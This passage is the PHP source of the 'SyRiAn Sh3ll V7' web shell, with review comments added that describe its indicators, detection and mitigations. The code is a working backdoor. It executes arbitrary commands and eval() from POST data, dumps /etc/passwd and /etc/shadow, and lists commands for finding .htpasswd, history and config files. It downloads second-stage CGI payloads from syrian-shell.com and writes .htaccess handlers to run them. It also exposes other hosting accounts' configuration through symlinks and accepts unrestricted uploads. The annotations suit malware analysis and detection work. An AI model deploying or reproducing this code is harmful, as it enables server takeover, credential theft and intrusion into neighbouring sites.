  641. <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
  642. <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
  643. <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
  644. <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
  645. <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
  646. <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
  647. <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
  648. <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
  649. <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
  650. <option value='locate httpd.conf'>locate httpd.conf files</option>
  651. <option value='locate vhosts.conf'>locate vhosts.conf files</option>
  652. <option value='locate proftpd.conf'>locate proftpd.conf files</option>
  653. <option value='locate psybnc.conf'>locate psybnc.conf files</option>
  654. <option value='locate my.conf'>locate my.conf files</option>
  655. <option value='locate admin.php'>locate admin.php files</option>
  656. <option value='locate cfg.php'>locate cfg.php files</option>
  657. <option value='locate conf.php'>locate conf.php files</option>
  658. <option value='locate config.dat'>locate config.dat files</option>
  659. <option value='locate config.php'>locate config.php files</option>
  660. <option value='locate config.inc'>locate config.inc files</option>
  661. <option value='locate config.inc.php'>locate config.inc.php</option>
  662. <option value='locate config.default.php'>locate config.default.php files</option>
  663. <option value='locate config'>locate config* files </option>
  664. <option value='locate \'.conf\''>locate .conf files</option>
  665. <option value='locate \'.pwd\''>locate .pwd files</option>
  666. <option value='locate \'.sql\''>locate .sql files</option>
  667. <option value='locate \'.htpasswd\''>locate .htpasswd files</option>
  668. <option value='locate \'.bash_history\''>locate .bash_history files</option>
  669. <option value='locate \'.mysql_history\''>locate .mysql_history files</option>
  670. <option value='locate \'.fetchmailrc\''>locate .fetchmailrc files</option>
  671. <option value='locate backup'>locate backup files</option>
  672. <option value='locate dump'>locate dump files</option>
  673. <option value='locate priv'>locate priv files</option>
  674. </select>
  675. ";
  676. }
  677. }
  # Opens $name in "w+" mode, writes $content and closes the handle, with every error suppressed
  # by @. Always returns true, whether or not the file could be opened or written.
  # Defender note: file creation by the web-server account inside served directories is what
  # file-integrity monitoring on the web root is meant to catch.
  678. function GenerateFile($name,$content)
  679. {
  680. $file = @fopen($name,"w+");
  681. @fwrite($file,$content);
  682. @fclose($file);
  683. return true;
  684. }
  # Runs "which $pr" through Exe() and returns the trimmed output; when the output is empty it
  # returns the trimmed $pr itself. $pr is placed in the command line as given.
  685. function which($pr)
  686. {
  687. $path = Exe("which $pr");
  688. if(!empty($path))
  689. {
  690. return trim($path);
  691. }
  692. else
  693. {
  694. return trim($pr);
  695. }
  696. }
  # Returns 1 when $func exists, is callable and does not occur as a substring of the global
  # $disablefunctions; returns 0 otherwise. It also returns 0 when the global $safemode equals
  # 'ON' and $func is one of the listed process-execution functions.
  # Both globals are assigned outside the visible part of the file.
  697. function checkfunctioN($func)
  698. {
  699. global $disablefunctions,$safemode;
  700. $safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open');
  701. if($safemode=='ON' && in_array($func,$safe))return 0;
  702. elseif(function_exists($func) && is_callable($func) && !strstr($disablefunctions,$func))return 1;
  703. return 0;
  704. }
  # Builds and returns the page head as one string: the <title>, a favicon link, the stylesheet
  # (with $shellColor spliced into several rules) and a small <script> block.
  # The script defines the client-side Suicide(): after a confirm() dialog it navigates to
  # "<this file>?id=Delete", which triggers the server-side self-delete; on cancel it reloads the
  # script without parameters. When $_GET['id'] is empty a redirect to ?id=mainPage is appended.
  # Defender note: the fixed <title> text and the favicon URL on syrian-shell.com are static
  # strings usable for content signatures, and the favicon fetch is an outbound request made by
  # the browser of whoever views the page.
  705. function CSS($shellColor)
  706. {
  707.  
  708. $css = "
  709. <html dir=rtl>
  710. <head>
  711. <title>SyRiAn Sh3ll ~ V7~ [ B3 Cr34T!V3 Or D!3 TRy!nG ]</title>
  712. <link rel=\"shortcut icon\" href='http://syrian-shell.com/title.gif' />
  713. <meta http-equiv=Content-Type content=text/html; charset=windows-1256>
  714. <style>
  715. BODY
  716. {
  717. FONT-FAMILY: Verdana;
  718. margin: 2;
  719. color: #cccccc;
  720. background-color: #000000;
  721. }
  722. sy
  723. {
  724. color:".$shellColor.";
  725. font-size:7pt;
  726. font-weight: bold;
  727. }
  728. #Box
  729. {
  730. color:".$shellColor.";
  731. font-size:14px;
  732. background-color:#000;
  733. font-weight:bold;
  734. }
  735. tr
  736. {
  737. BORDER-RIGHT: #cccccc 1px solid;
  738. BORDER-TOP: #cccccc 1px solid;
  739. BORDER-LEFT: #cccccc 1px solid;
  740. BORDER-BOTTOM: #cccccc 1px solid;
  741. color: #ffffff;
  742. }
  743. td
  744. {
  745. BORDER-RIGHT: #cccccc 1px solid;
  746. BORDER-TOP: #cccccc 1px solid;
  747. BORDER-LEFT: #cccccc 1px solid;
  748. BORDER-BOTTOM: #cccccc 1px solid;
  749. color: #cccccc;
  750. }
  751. .table1
  752. {
  753. BORDER: 1px none;
  754. BACKGROUND-COLOR: #000000;
  755. color: #333333
  756. }
  757. .td1
  758. {
  759. BORDER: 1px none;
  760. color: #ffffff; font-style:normal;
  761. font-variant:normal;
  762. font-weight:normal;
  763. font-size:7pt;
  764. font-family:tahoma
  765. }
  766. .tr1
  767. {
  768. BORDER: 1px none;
  769. color: #cccccc;
  770. }
  771. table
  772. {
  773. BORDER: #eeeeee outset;
  774. BACKGROUND-COLOR: #000000;
  775. color: #cccccc;
  776. }
  777. input
  778. {
  779. BORDER-RIGHT: ".$shellColor." 1px solid;
  780. BORDER-TOP: ".$shellColor." 1px solid;
  781. BORDER-LEFT: ".$shellColor." 1px solid;
  782. BORDER-BOTTOM: ".$shellColor." 1px solid;
  783. BACKGROUND-COLOR: #333333;
  784. font: 9pt tahoma;
  785. color: #ffffff;
  786. }
  787. select
  788. {
  789. BORDER-RIGHT: #ffffff 1px solid;
  790. BORDER-TOP: #999999 1px solid;
  791. BORDER-LEFT: #999999 1px solid;
  792. BORDER-BOTTOM: #ffffff 1px solid;
  793. BACKGROUND-COLOR: #000000;
  794. font: 9pt tahoma;
  795. color: #CCCCCC;;
  796. }
  797. submit
  798. {
  799. BORDER: 1px outset buttonhighlight;
  800. BACKGROUND-COLOR: #272727;
  801. width: 40%;
  802. color: #cccccc;
  803. }
  804. textarea
  805. {
  806. BORDER-RIGHT: #ffffff 1px solid;
  807. BORDER-TOP: #999999 1px solid;
  808. BORDER-LEFT: #999999 1px solid;
  809. BORDER-BOTTOM: #ffffff 1px solid;
  810. BACKGROUND-COLOR: #333333;
  811. color: #ffffff;
  812. }
  813. A:link {COLOR:".$shellColor."; TEXT-DECORATION: none}
  814. A:visited { COLOR:".$shellColor."; TEXT-DECORATION: none}
  815. A:active {COLOR:".$shellColor."; TEXT-DECORATION: none}
  816. A:hover {color:blue;TEXT-DECORATION: none}
  817. </style>
  818. <script>
  819. function Suicide()
  820. {
  821. var confimrSuicide = confirm('Are You Sure You Wanna Delete the Shell ?');
  822. if(confimrSuicide == true)
  823. {
  824. document.location='".currentFileName()."?id=Delete';
  825. }
  826. else {document.location='".currentFileName()."';}
  827. }
  828. </script>
  829. </head>";
  830. if($_GET['id'] == '')
  831. {
  832. $css .= "<script>window.location = '?id=mainPage';</script>";
  833. }
  834. return $css;
  835. }
  # Prints a <script> block that overwrites the "user" and "pass" cookies with empty values and
  # then navigates to the bare script name. The session is ended entirely in the browser; no
  # server-side state is involved.
  836. function Logout()
  837. {
  838. print"<script>
  839. document.cookie='user=';
  840. document.cookie='pass=';
  841. var url = window.location.pathname;
  842. var filename = url.substring(url.lastIndexOf('/')+1);
  843. window.location=filename;
  844. </script>";
  845. }
  846.  
  # Returns the HTML of the "About" page: author credits, an image loaded from
  # www.syrian-shell.com, and a POST form with the fields from, message and sendEmail.
  # The code that handles the sendEmail submission is outside the visible part of the file.
  # Defender note: the credit strings and the image URL are further static strings usable for
  # content signatures.
  847. function About()
  848. {
  849. $about = "
  850. <table bgcolor=#cccccc width=\"100%\">
  851. <tbody><tr><td width=1025>
  852. <div align=center><img src='http://www.syrian-shell.com/eagle.jpg'><br>
  853. </div>
  854. <sy><div align=center>Coded By : EH << SyRiAn | 34G13</div></sy>
  855. <sy><div align=center>From </font>: SyRiAn Arabic Republic </div></sy>
  856. <sy><div align=center>Age : 4/1991<br></div></sy>
  857. <sy><div align=center>Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ]</div></sy>
  858. <sy><div align=center>Thanx : my school : [ www.google.com ] :)</div></sy>
  859. <sy><br><div align=center>B3 Cr34T!V3 0R D!3 TRy!nG </div></sy>
  860. <br/>
  861. <center>
  862. <br/>
  863. <form method='POST'>
  864. <input type='text' name='from' value='yourEmail@example.com' size='40'/><br/>
  865. <textarea name='message' cols='25' rows='10'>Please Report Us Bugs Or suggestions .</textarea><br/>
  866. <input type='submit' value='Submit' name='sendEmail' />
  867. </form></center>
  868. </td></tr></tbody></table>";
  869. return $about;
  870. }
  # Emits the page head built by CSS() before anything else is decided.
  871. echo CSS($shellColor);
  872. # ---------------------------------------#
  873. # Authentication #
  874. #----------------------------------------#
  # Analysis note: the login gate runs only when $uselogin is 1. A request passes it when the
  # "user" cookie equals $user and the "pass" cookie equals md5($pass). Otherwise, if the POSTed
  # usrname/passwrd match the configured pair, a <script> is printed that sets those two cookies
  # from the browser side; the cookie therefore carries an unsalted MD5 of the password and is
  # script-readable. In every other case the login form is printed and the script exits.
  # The POST keys are written as bare constants in two places, and the posted user name is echoed
  # into the script block without escaping.
  # Defender note: the login page text and the image URL on www.syrian-shell.com are static
  # strings usable for content signatures and for spotting the page in proxy or crawler data.
  875. if ($uselogin ==1)
  876. {
  877. if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass))
  878. {
  879. if($_POST[usrname]==$user && $_POST[passwrd]==$pass)
  880. {
  881. print'<script>document.cookie="user='.$_POST[usrname].';";document.cookie="pass='.md5($_POST[passwrd]).';";</script>';
  882. }
  883. else
  884. {
  885. if($_POST['usrname'])
  886. {
  887. print'<script>alert("Go and play in the street man !!");</script>';
  888. }
  889. echo '
  890. <body bgcolor="black"><br><br>
  891. <center><font color=#990000 size=5><b>SyRi</b></font><font color=green size=5><b>An Sh</b></font><font color=gray size=5><b>3ll</b></font><br>
  892.  
  893. <img src="http://www.syrian-shell.com/eagle.jpg">
  894. </center>
  895. <div align="center">
  896. <form method="POST" onsubmit="if(this.usrname.value==\'\'){return false;}">
  897. <input dir="ltr" name="usrname" value="userName" type="text" size="30" onfocus="if (this.value == \'UserName\'){this.value = \'\';}"/><br>
  898. <input dir="ltr" name="passwrd" value="password" type="password" size="30" onfocus="if (this.value == \'PassWord\') this.value = \'\';" /><br>
  899. <input type="submit" value=" Login " name="login" />
  900. </form></p>';
  901. exit;
  902. }
  903. }
  904. }
  905. # ---------------------------------------#
  906. # Some Info #
  907. #----------------------------------------#
  # Host facts gathered for the status banner that follows.
  # $os is "Windows" when the working directory's second character is ':' (a drive letter),
  # otherwise "Linux"; no other platform is distinguished.
  # $serverIP is resolved from the HTTP_HOST value, which comes from the request's Host header.
  # NOTE(review): $SERVER_SOFTWARE is not assigned anywhere in the visible part of the file; it
  # looks like a register_globals-era variable, so $server is presumably empty on current PHP.
  908. $dir = getcwd();
  909. $uname= @php_uname();
  910. if(strlen($dir)>1 && $dir[1]==":")
  911. $os = "Windows";
  912. else $os = "Linux";
  913. $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
  914. $server = @substr($SERVER_SOFTWARE,0,120);
  915.  
  916. echo "
  917. <body dir=\"ltr\"><table bgcolor=#cccccc cellpadding=0 cellspacing=0 width=\"100%\"><tbody><tr><td bgcolor=#000000 width=160>
  918. <p dir=ltr>&nbsp;&nbsp;</p>
  919. <div dir=ltr align=center><font size=4><b>
  920. <img border=0 src=http://www.library-ar.com/cache/eagle.jpg width=101 height=93>&nbsp;</b></font><div
  921. dir=ltr align=center><span style=height: 25px;><b>
  922. <font size=4 color=#FF0000>SyRi</font><font size=4 color=#008000>An Sh</font><font size=4 color=#999999>3ll<br>V7</font></b><span style=font-size: 20pt; color:
  923.  
  924. #990000><p></p></span></span></div></td><td
  925. bgcolor=#000000>
  926. <p dir=ltr><font size=1>&nbsp; <b>[<a href=?id=mainPage>Main</a>]</b></span>
  927. <font color=black></span></font><b>[</span><a href=?id=scriptsHack>Forum Defacer</a>]</b></span>
  928. <b>[</span><a href=?id=spamming>Email Spammer</a>]</b></span>
  929. <b>[</span><a href=?id=about>About</a>]</b></span>
  930. <b>[</span><a href=?id=logout>Logout</a>]</b></span>
  931. <b>[</span><a href=?id=100>SuiCide</a>]</b></span>
  932. <br>
  933. <font size=1><br>
  934. &nbsp; Safe Mode = <sy>".@SafeMode()." </sy><font size=1>
  935. &nbsp; System = <sy>".$os."</sy>
  936. &nbsp; Magic_Quotes = <sy>". @magicQouts()." </sy>
  937. &nbsp; Curl = <sy>".@Curl()." </sy>
  938. &nbsp; Register Globals = <sy>".@RegisterGlobals()." </sy>
  939. &nbsp; Open Basedir = <sy>".@openBaseDir()." </sy>
  940. <br>
  941. &nbsp; Gzip = <sy>".@Gzip()."</sy>
  942. &nbsp; MySQLI = <sy>".@MysqlI()." </sy>
  943. &nbsp; MSQL = <sy>".@MSQL()."</sy>
  944. &nbsp; SQL Lite = <sy>".@SQlLite()."</sy>
  945. &nbsp; Usefull Locals = <sy>".rootxpL()." </sy>
  946. <br>
  947. &nbsp; Free Space = <sy>".@HardSize(disk_free_space('/'))." </sy>
  948. &nbsp; Total Space = <sy>".@HardSize(disk_total_space("/"))." </sy>
  949. &nbsp; PHP Version = <sy>".@phpversion()." </sy>
  950. &nbsp; Zend Version = <sy>".@zend_version()." </sy>
  951. &nbsp; MySQL Version = <sy>".@mysql_get_server_info()." </sy>
  952. <br>
  953. &nbsp; MySQL = ".MySQL2()."
  954. &nbsp; MsSQL = ".MsSQL()."
  955. &nbsp; PostgreSQL = ".PostgreSQL()."
  956. &nbsp; Oracle = ".Oracle()."
  957. &nbsp; Server Name = <sy>".$_SERVER['HTTP_HOST']." </sy>
  958. &nbsp; Server Admin = <sy>".$_SERVER['SERVER_ADMIN']." </sy>
  959. <br>
  960. &nbsp; Dis_Functions = <sy>". DisableFunctions()." </sy><br>
  961. &nbsp; Your IP = <sy>".GetRealIP()." </sy>
  962. &nbsp; Server IP = <sy><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">".gethostbyname($_SERVER["HTTP_HOST"])."
  963.  
  964. </sy></a>
  965. [</span><a href=http://www.yougetsignal.com/tools/web-sites-on-web-server target=\"_blank\"/>Reverse IP</a>]</span>
  966. &nbsp; Date Time = <sy>".date('Y-m-d H:i:s')." </sy><br/>
  967. &nbsp;
  968. [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
  969. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
  970. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
  971. <br>
  972. <br>
  973. <table bgcolor=#cccccc width=\"100%\"><tbody><tr>
  974. <td align=right width=100><p dir=ltr>
  975. <sy>&nbsp;&nbsp;Server :&nbsp;&nbsp; <br>
  976. <b>uname -a : &nbsp;
  977. <br>pwd : </span>&nbsp;<br>ID : </span>&nbsp;<br></b></sy></td><td>
  978. <p dir=ltr><font color=#cccccc size=-2><b> &nbsp;&nbsp;".$server."
  979. <br>&nbsp;&nbsp;".$uname." <sy><a href=http://www.google.com/search?q=".urlencode(@php_uname())." target=_blank>[Google]</a></sy><br>&nbsp;&nbsp;".
  980.  
  981. $dir."<br>&nbsp;&nbsp;".Exe('id')."</b>
  982. </font></td></tr></tbody>
  983. </table>
  984. &nbsp;&nbsp;[<a href='#down'>Down</a>]
  985. [<a href='javascript:window.print()'>Print</a>]
  986. </table>";
  987.  
  988. # ---------------------------------------#
  989. # Main Page #
  990. #----------------------------------------#
  991. if ($_GET['id']== 'mainPage')
  992. {
  993. echo "<form method='post'><table width=100% border=1><tr><td>
  994. <textarea name='ExecutionArea' rows=10 cols=152 style='color=red'>";
  995.  
  # NOTE(review): Command-execution dispatcher. Exe() is defined outside this excerpt; from its use here it appears to
  # run an operating-system command and return the output - confirm against its definition.
  # Request fields read: directory, alias, cmd (all from $_POST, none validated).
  # Detection: a web-server/PHP worker process spawning dir/ls or arbitrary child processes, and POST bodies that carry
  # the field names submitCommands, Execute, alias or cmd.
  # Mitigation: disable the process-execution functions in disable_functions and alert on child processes of the PHP worker.
  996. if(!$_POST || $_POST['login']) // Show Current Directory Contents if No Post in requesting ...
  997. {
  # The working directory is switched to a client-supplied path; '@' hides the failure when the field is absent.
  998. @chdir($_POST['directory']);
  999. if($os == "Windows")
  1000. {
  1001. echo Exe('dir');
  1002. }
  1003. else if($os == "Linux")
  1004. {
  1005. echo Exe('ls');
  1006. }
  1007. }
  1008. else if($_POST['submitCommands']) // Execute The Alias Command .
  1009. {
  # The "alias" value is passed to Exe() exactly as received.
  1010. echo Exe($_POST['alias']);
  1011. }
  1012. else if($_POST['Execute']) // Execute The Command From Command Line .
  1013. {
  1014. @chdir($_POST['directory']);
  1015. if(empty($_POST['cmd']))
  1016. {
  # With no command supplied the branch falls back to a directory listing.
  1017. if($os == "Windows")
  1018. {
  1019. echo Exe('dir');
  1020. }
  1021. else if($os == "Linux")
  1022. {
  1023. echo Exe('ls -lia');
  1024. }
  1025. }
  1026. else
  1027. {
  # Free-form command string from the request, passed to Exe() unchanged.
  1028. echo Exe($_POST['cmd']);
  1029. }
  1030. }
  # NOTE(review): Arbitrary PHP execution. The php_eval POST field is evaluated inside the web application's process,
  # with whatever file-system and database access that process has.
  # Detection: static scanners should flag eval() fed from $_POST; at runtime, look for POST bodies carrying the
  # submitEval / php_eval field names.
  1031. else if($_POST['submitEval']) // Execute Eval Code .
  1032. {
  # The replacements only strip PHP open/close tags and backslashes so the text parses as code;
  # they are formatting clean-up, not input validation.
  1033. $eval = @str_replace("<?php","",$_POST['php_eval']);
  1034. $eval = @str_replace("<?php","",$eval);
  1035. $eval = @str_replace("?>","",$eval);
  1036. $eval = @str_replace("\\","",$eval);
  1037. echo eval($eval);
  1038. }
  1039. # --------------------------
  1040. # Hash Analyzer
  1041. #---------------------------
  1042. else if($_POST['analyzieNow'])
  1043. {
  1044. $hash = $_POST['hashToAnalyze'];
  1045. $subHash = substr($hash,0,3);
  1046. if($subHash =='$ap' && strlen($hash) == 37)
  1047. {
  1048. echo "The Hash : ".$hash." is : MD5(APR) Hash";
  1049. }
  1050. else if($subHash =='$1$' && strlen($hash) == 34)
  1051. {
  1052. echo "The Hash : ".$hash." is : MD5(UNIX) Hash";
  1053. }
  1054. else if($subHash =='$H$' && strlen($hash) == 35)
  1055. {
  1056. echo "The Hash : ".$hash." is : MD5(phpBB3) Hash";
  1057. }
  1058. else if(strlen($hash) == 29)
  1059. {
  1060. echo "The Hash : ".$hash." is : MD5(Wordpress) Hash";
  1061. }
  1062. else if($subHash =='$5$' && strlen($hash) == 64)
  1063. {
  1064. echo "The Hash : ".$hash." is : SHA256(UNIX) Hash";
  1065. }
  1066. else if($subHash =='$6$' && strlen($hash) == 128)
  1067. {
  1068. echo "The Hash : ".$hash." is : SHA512(UNIX) Hash";
  1069. }
  1070. else if(strlen($hash) == 56)
  1071. {
  1072. echo "The Hash : ".$hash." is : SHA224 Hash";
  1073. }
  1074. else if(strlen($hash) == 64)
  1075. {
  1076. echo "The Hash : ".$hash." is : SHA256 Hash";
  1077. }
  1078. else if(strlen($hash) == 96)
  1079. {
  1080. echo "The Hash : ".$hash." is : SHA384 Hash";
  1081. }
  1082. else if(strlen($hash) == 128)
  1083. {
  1084. echo "The Hash : ".$hash." is : SHA512 Hash";
  1085. }
  1086. else if(strlen($hash) == 40)
  1087. {
  1088. echo "The Hash : ".$hash." is : MySQL v5.x Hash";
  1089. }
  1090. else if(strlen($hash) == 16)
  1091. {
  1092. echo "The Hash : ".$hash." is : MySQL Hash";
  1093. }
  1094. else if(strlen($hash) == 13)
  1095. {
  1096. echo "The Hash : ".$hash." is : DES(Unix) Hash";
  1097. }
  1098. else if(strlen($hash) == 32)
  1099. {
  1100. echo "The Hash : ".$hash." is : MD5 Hash";
  1101. }
  1102. else if(strlen($hash) == 4)
  1103. {
  1104. echo "The Hash : ".$hash." is : [CRC-16]-[CRC-16-CCITT]-[FCS-16]";}
  1105. else
  1106. {
  1107. echo "Error : Can't Detect Hash Type";
  1108. }
  1109. }
  1110. # --------------------------
  1111. # Show Users
  1112. #---------------------------
  # NOTE(review): Account enumeration. Prints the first of several account/mail-alias files that Exe() manages to read
  # (Exe() is defined outside this excerpt; presumably it runs the command and returns its output - confirm).
  # Detection: `cat` of /etc/passwd, /etc/shadow or the alias files executed as a child of the web-server process.
  # Mitigation: the web user should never be able to read /etc/shadow; keep process execution disabled for PHP workers.
  1113. else if($_POST['showUsers'])
  1114. {
  # Declared inside the branch, so the function only exists once this branch has run.
  1115. function showUsers()
  1116. {
  1117.  
  # Each condition assigns the command output to $rows and uses its truthiness as "the read worked".
  1118. if($rows = Exe('cat /etc/passwd'))
  1119. {
  1120. echo $rows;
  1121. }
  1122. elseif($rows= Exe('cat /etc/domainalias'))
  1123. {
  1124. echo $rows;
  1125. }
  1126. elseif($rows= Exe('cat /etc/shadow'))
  1127. {
  1128. echo $rows;
  1129. }
  1130. elseif($rows= Exe('cat /var/mail'))
  1131. {
  1132. echo $rows;
  1133. }
  1134. elseif($rows= Exe('cat /etc/valiases'))
  1135. {
  1136. echo $rows;
  1137. }
  1138. else { echo "[-] Can't Show Users :( ... Sorry ";}
  1139. }
  1140. showUsers();
  1141. }
  1142. # --------------------------
  1143. # Generate perl
  1144. #---------------------------
  # NOTE(review): Second-stage dropper. Creates a "cgi" directory under a client-supplied path, downloads and unpacks an
  # archive from a hard-coded host, and writes an .htaccess that makes the web server execute *.sy3 files as CGI.
  # Indicators visible here: the download URL below, the file names cgiPerl.sy3.zip / cgiPerl.sy3 / compiler, and an
  # .htaccess containing "AddHandler cgi-script .sy3".
  # Detection: wget/unzip spawned by the web-server user; new or modified .htaccess files inside the document root.
  # Mitigation: restrict AllowOverride so per-directory handlers cannot be added, and block outbound HTTP from web workers.
  1145. else if($_POST['generatePel'])
  1146. {
  1147. @chdir($_POST["cgiperlPath"]);
  1148. @mkdir("cgi", 0755);
  1149. @chdir("cgi");
  # Exe() is defined outside this excerpt; its return value is ignored, so a failed download is not reported.
  1150. Exe('wget http://www.syrian-shell.com/cgiPerl/cgiPerl.sy3.zip');
  1151. Exe('unzip cgiPerl.sy3.zip');
  1152. @unlink('cgiPerl.sy3.zip');
  1153. @chmod("cgiPerl.sy3",0755);
  # World-writable mode on the extracted "compiler" entry.
  1154. @chmod("compiler",0777);
  # 'w+' truncates any .htaccess already present in the directory; the handle is not closed in this branch.
  1155. $cgi_h = fopen('.htaccess','w+');
  1156. @fwrite($cgi_h,'AddHandler cgi-script .sy3');
  # The message is printed unconditionally; note it names "cgi.sy3" while the file handled above is cgiPerl.sy3.
  1157. echo '
  1158. cgi.sy3 & .htaccess Has Been Created in [ cgi ] Directory
  1159. Password Is : sy34' ;
  1160. }
  1161. # --------------------------
  1162. # Generate Server
  1163. #---------------------------
  # NOTE(review): Cross-account source disclosure on shared hosting. Creates an "allserver" directory, places a symlink
  # to the file-system root inside it, and writes an .htaccess that enables directory indexes, follows symlinks and maps
  # .php to a non-executing type so the web server returns PHP source (for example other sites' configuration files) as text.
  # Detection: symlinks inside the document root that point to / or outside the account's home; .htaccess files carrying
  # "AddType txt .php" or "AddHandler txt .php".
  # Mitigation: use SymLinksIfOwnerMatch instead of FollowSymLinks and do not allow Options/FileInfo overrides in .htaccess.
  1164. else if($_POST['generateSER'])
  1165. {
  1166. @chdir($_POST['ShourtCutPath']);
  1167. @mkdir("allserver", 0755);
  1168. @chdir("allserver");
  # Exe() and GenerateFile() are defined outside this excerpt; GenerateFile presumably writes the second argument
  # to the file named by the first - confirm.
  1169. Exe("ln -s / allserver");
  1170. GenerateFile(".htaccess","
  1171. Options Indexes FollowSymLinks
  1172. DirectoryIndex ssssss.htm
  1173. AddType txt .php
  1174. AddHandler txt .php");
  # The client-supplied path is echoed back without HTML escaping.
  1175. echo 'Now Go to allserver folder '.$_POST['ShourtCutPath'].'' ;
  1176. }
  1177. # --------------------------
  1178. # Change Mode
  1179. #---------------------------
  # NOTE(review): Permission change on an arbitrary path. Both the file name and the mode come straight from the
  # request and are handed to chmod(); only the boolean result is reported.
  # Detection: file-integrity monitoring on permission changes made by the web-server user.
  1180. else if($_POST['changePermission'])
  1181. {
  # '@' suppresses the warning chmod() raises for a missing file or a denied change.
  1182. $ch_ok = @chmod($_POST['fileName'],$_POST['per']);
  1183. if($ch_ok)
  1184. echo "Permission Changed Successfully ! " ;
  1185. else echo "Changing Is Not Allowed Or The File is not Exist !";
  1186. }
  1187. # --------------------------
  1188. # Generate Users
  1189. #---------------------------
  # NOTE(review): Second-stage dropper, same pattern as the "cgi" branch: creates a "users" directory under a
  # client-supplied path, downloads a file from a hard-coded host, renames it to users.sy3, marks it executable and
  # writes an .htaccess that runs *.sy3 as CGI.
  # Indicators visible here: the download URL below, users.rar / users.sy3, and "AddHandler cgi-script .sy3".
  # Detection: wget/mv spawned by the web-server user and new .htaccess files in the document root.
  1190. else if($_POST['GenerateUsers'])
  1191. {
  1192. @chdir($_POST['usersPath']);
  1193. @mkdir("users", 0755);
  1194. @chdir('users');
  # Exe() is defined outside this excerpt; return values are ignored, so failures are silent.
  1195. Exe('wget http://www.syrian-shell.com/usersAndDomains/users.rar');
  1196. Exe('mv users.rar users.sy3');
  1197. @chmod('users.sy3',0755 );
  # 'w+' truncates an existing .htaccess; the handle is never closed in this branch.
  1198. $user_h = fopen('.htaccess','w+');
  1199. fwrite($user_h,'AddHandler cgi-script .sy3');
  # Success is reported unconditionally.
  1200. echo "users.sy3 & .htaccess Has Been Created in [ users ] Directory" ;
  1201. }
  1202. # --------------------------
  1203. # Forbidden
  1204. #---------------------------
  # NOTE(review): Writes one of several .htaccess variants into a new "forbidden" directory. Every variant makes the
  # web server serve a file named in.txt (as index, header, readme or footer of a listing) or return PHP files as
  # text; the closing message shows that in.txt is meant to be a symlink to another account's file.
  # Detection: .htaccess files containing DirectoryIndex/HeaderName/ReadmeName pointing at in.txt, or
  # "AddHandler txt .php"; symlinks in the document root whose target is outside the owning account.
  # Mitigation: SymLinksIfOwnerMatch, restricted AllowOverride, and per-account file-system isolation.
  1205. else if($_POST['generateForbidden'])
  1206. {
  1207. @chdir($_POST['forbiddenPath']);
  1208. @mkdir('forbidden');
  1209. @chdir('forbidden');
  # 'w+' truncates any existing .htaccess; the handle is not checked or closed in this branch.
  1210. $htaccess = fopen('.htaccess','w+');
  # The POST field named "403" selects the variant; an unknown value leaves the file empty.
  1211. if($_POST['403'] == 'DirectoryIndex')
  1212. {
  1213. fwrite($htaccess,"DirectoryIndex in.txt");
  1214. }
  1215. elseif($_POST['403'] == 'HeaderName')
  1216. {
  1217. fwrite($htaccess,"HeaderName in.txt");
  1218. }
  1219. elseif($_POST['403'] == 'TXT')
  1220. {
  1221. fwrite($htaccess,"
  1222. Options Indexes FollowSymLinks
  1223. addType txt .php
  1224. AddHandler txt .php");
  1225. }
  1226. elseif($_POST['403'] == '404')
  1227. {
  1228. fwrite($htaccess,"
  1229. ErrorDocument 404 /404.html
  1230. 404.html = Symlinked in.txt ");
  1231. }
  1232. elseif($_POST['403'] == 'ReadmeName')
  1233. {
  1234. fwrite($htaccess,"ReadmeName in.txt");
  1235. }
  1236. elseif($_POST['403'] == 'footerName')
  1237. {
  1238. fwrite($htaccess,"footerName in.txt");
  1239. }
  1240. echo "
  1241. Now Go To [ forbidden ] Dir And Then make The Shortcut [ in.txt ]
  1242. EX : ln -s /home/user/public_html/config.php in.txt";
  1243. }
  1244. # --------------------------
  1245. # Upload Files
  1246. #---------------------------
  # NOTE(review): Unrestricted multi-file upload. Files from the "uploadfile[]" form field are moved out of PHP's
  # temporary directory with no check on type, extension or size, and the client-supplied file name is used as part
  # of the destination.
  # Detection: new files created in the document root by the web-server user, especially executable script types.
  # Mitigation: make the document root read-only for the PHP worker and deny script execution in any writable directory.
  1247. else if($_POST['UploadNow'])
  1248. {
  1249. $nbr_uploaded =0;
  1250. $files_uploded = array();
  1251. $path= '';
  # $i is not yet defined when this line runs, so the value is computed once, before the loop, from an undefined index.
  1252. $target_path= $path . basename($_FILES['uploadfile']['name'][$i]);
  1253. for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++)
  1254. {
  1255. if($_FILES['uploadfile']['name'][$i] != '')
  1256. {
  # The result of move_uploaded_file() is ignored; success is printed regardless.
  1257. move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $target_path . $_FILES['uploadfile']['name'][$i]);
  1258. $files_uploded[] = $_FILES['uploadfile']['name'][$i];
  1259. $nbr_uploaded++;
  1260. echo "The File ".basename($_FILES['uploadfile']['name'][$i])." Uploaded Successfully !
  1261. ";
  1262. }
  # The else arm is a bare string expression (no echo), so nothing is printed for an empty name.
  1263. else "The File ".basename($_FILES['uploadfile']['name'][$i])." Can't Be Upload :( !";
  1264. }
  1265. }
  1266. # --------------------------
  1267. # no Security
  1268. #---------------------------
  # NOTE(review): Three branches that try to weaken the host's PHP and web-application-firewall settings from inside
  # the account. GenerateFile() is defined outside this excerpt; presumably it writes the second argument to the
  # file named by the first - confirm.
